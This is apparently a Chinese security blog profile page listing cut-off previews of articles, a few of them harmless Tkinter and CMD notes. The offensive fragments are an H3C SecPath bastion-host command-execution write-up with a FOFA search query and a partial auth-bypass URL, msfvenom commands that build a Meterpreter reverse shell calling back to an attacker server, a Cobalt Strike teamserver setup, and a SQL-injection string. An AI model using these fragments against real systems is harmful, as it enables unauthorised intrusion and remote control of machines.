
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
文章目录漏洞描述漏洞影响漏洞复现漏洞描述H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞漏洞影响H3C SecParh堡垒机漏洞复现fofa语法:app="H3C-SecPath-运维审计系统"先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%
借鉴:https://blog.csdn.net/cao0507/article/details/82758288https://blog.csdn.net/weixin_34244102/article/details/88677915
文章目录0x00 前言0x01 窗口标题、尺寸0x02 设置文字label0x03 显示图片Image0x04 按键Button与消息窗口tkMessageBox0x05 输入框 Entry0x06 绘图Canvas0x00 前言Python 提供了多个图形开发界面的库,几个常用 Python GUI 库如下:Tkinter: Tkinter 模块(Tk 接口)是 Python 的标准 Tk GU
因为关闭ssh之后,运行的进程也会被关闭,所以要用到screen命令下载screenapt-get install screen创建一个子界面screen按任意键进入子界面,然后运行cschmod +x./teamserver./teamserver 服务器地址 密码按ctrl+a再按d,退出子界面,这时候 我回到了父界面用screen –ls查看目前子界面的状态screen -ls如果回到子界面
文章目录生成小马文件运行小马维持会话生成小马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe生成的小马在root目录下运行小马// 进入msfmsfconsole// 监听use exploit/multi/handler// 设置payloadset payload
文章目录0x01 CMD变量0x02 自定义窗口0x01 CMD变量自定义变量C:\Users\DELL>set name=123输出变量C:\Users\DELL>set namename=123C:\Users\DELL>echo %name%123删除变量,赋值变量为空即可C:\Users\DELL>set name=C:\Users\DELL>set name
00X01 [强网杯 2019]随便注1’ or 1=1 #
文章目录0x01 String Filters0x01 String Filters1,string.rot13string.rot13对字符串执行 ROT13 转换,ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母,同时忽略非字母表中的字符。2,string.toupperstring.toupper 将字符串转化为大写3,string.tolowerstring.touppe
项目地址:https://github.com/shimmeris/SCFProxy/tree/main/SOCKS5我配置的是socks5云函数配置1.开通腾讯云函数服务2.在 函数服务 > 新建 中使用自定义创建,函数名称及地域任选,运行环境选择 Python3.6。3.修改 server.py 中的 bridge_ip 与 bridge_port 变量为自己的 VPS 的 ip 及开启
文章目录0x01 环境搭建0x01 环境搭建整个环境如图所示设备型号路由器:AR1220交换机:S3700PCCloudVMware虚拟机:kali2020连线:autoPC1和PC2都使用dhcp配置网络交换机不需要配置云的配置好了,现在虚拟的PC和VMware虚拟机都配置好了,看看网络能不能通kal:192.168.43.245PC1:192.168.43.145PC2:192.168.43.